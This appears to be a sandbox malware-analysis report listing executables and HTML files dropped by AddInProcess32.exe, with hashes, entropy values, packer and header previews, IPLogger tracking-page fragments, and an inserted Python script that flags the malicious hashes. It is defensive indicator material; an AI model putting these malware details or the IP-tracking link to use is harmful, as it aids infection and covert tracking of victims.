                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
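Added example, not part of the Joe Sandbox report and not Joe Sandbox code: the Python below recomputes the fields these dropped-file entries show (size, the 8-bit Shannon entropy the "Entropy (8bit)" field reports, MD5/SHA-1/SHA-256/SHA-512, and a coarse file type from the MZ/PE and HTML magic bytes) and checks each SHA-256 against the three values marked Malicious:true above. KNOWN_BAD_SHA256 is taken from those entries; the 7.2 packed-entropy threshold, the build_fake_pe() skeleton and the sample buffers are assumptions constructed for the demonstration and are not loadable executables.

```python
"""Recompute the per-file fields of a sandbox 'dropped files' entry (size, 8-bit
Shannon entropy, MD5/SHA-1/SHA-256/SHA-512, coarse file type) and check the
SHA-256 against the report's known-bad set. Added example; not Joe Sandbox code."""
import hashlib
import math
import struct
import sys
from collections import Counter

# SHA-256 values of the three dropped PE files marked Malicious:true in the report.
KNOWN_BAD_SHA256 = {
    "258decb49c4ebc7f295bf24a8fea30a9555449906a8c97164ea8e37014a68d2b",
    "caf653628c3b248d6b9690fe887533e41c8eb03b859cb92ef6c1683d0cab7cdb",
    "532b964f0e1319e50ce1ba3a20e05a4d15f822084e92bdc1e799a1d18231acdb",
}

# Assumed triage heuristic, not a sandbox rule: a PE whose byte distribution is
# this close to uniform is usually packed or carries an encrypted payload.
PACKED_ENTROPY_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 to 8.0: the 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_type(data: bytes) -> str:
    """Coarse type from magic bytes: MZ + e_lfanew -> PE signature -> optional-header magic."""
    if len(data) >= 0x40 and data[:2] == b"MZ":
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        # PE signature (4 bytes) + COFF header (20 bytes) precede the optional-header magic.
        if len(data) >= e_lfanew + 0x1A and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            magic = struct.unpack_from("<H", data, e_lfanew + 0x18)[0]
            return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE (unknown magic)")
        return "MZ (no PE header)"
    head = data.lstrip()[:15].lower()
    if head.startswith((b"<!doctype html", b"<html")):
        return "HTML document"
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return "data"
    return "text"


def match_ioc(sha256_hex: str) -> bool:
    """Case-insensitive lookup of a SHA-256 hex digest against the known-bad set."""
    return sha256_hex.strip().lower() in KNOWN_BAD_SHA256


def describe(data: bytes) -> dict:
    """Produce the same fields the report table shows, plus two triage flags."""
    entropy = shannon_entropy(data)
    sha256 = hashlib.sha256(data).hexdigest()
    return {
        "size": len(data),
        "entropy": round(entropy, 6),
        "type": file_type(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": sha256,
        "sha512": hashlib.sha512(data).hexdigest(),
        "known_bad": match_ioc(sha256),
        "likely_packed": data[:2] == b"MZ" and entropy > PACKED_ENTROPY_THRESHOLD,
    }


def build_fake_pe(payload: bytes, pe32plus: bool = False) -> bytes:
    """Constructed, non-loadable MZ/PE skeleton used only to exercise file_type()."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew: PE header right after DOS header
    coff = b"PE\0\0" + bytes(20)                    # signature + zeroed COFF header
    magic = struct.pack("<H", 0x20B if pe32plus else 0x10B)
    return bytes(dos) + coff + magic + payload


if __name__ == "__main__":
    # Usage: python triage.py <dropped file> [...]; with no arguments, run on constructed samples.
    samples = {p: open(p, "rb").read() for p in sys.argv[1:]} or {
        "constructed-packed.exe": build_fake_pe(bytes(range(256)) * 64),
        "constructed-plain.exe": build_fake_pe(bytes(4096)),
        "constructed.html": b"<!DOCTYPE html>\n<html lang=\"\"><head></head></html>\n",
    }
    for name, blob in samples.items():
        print(name)
        for key, value in describe(blob).items():
            print(f"  {key}: {value}")
```

Run it against the extracted dropped files to confirm the table's hashes and entropy before relying on them as indicators. The 4405128-byte PE's reading of 7.969 is the kind of value the packed flag is meant to catch, while the 473089-byte PE at 7.146 and the 5387648-byte PE at 6.884 sit below the assumed threshold.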
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4407808
Entropy (8bit):7.9915034437777726
Encrypted:true
SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
MD5:3953BBAD77CDCB9D5AF2694EED7E6688
SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405128
Entropy (8bit):7.969340138439332
Encrypted:false
SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
MD5:F6C9E6F8396274E57FBA6BE593B90E36
SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
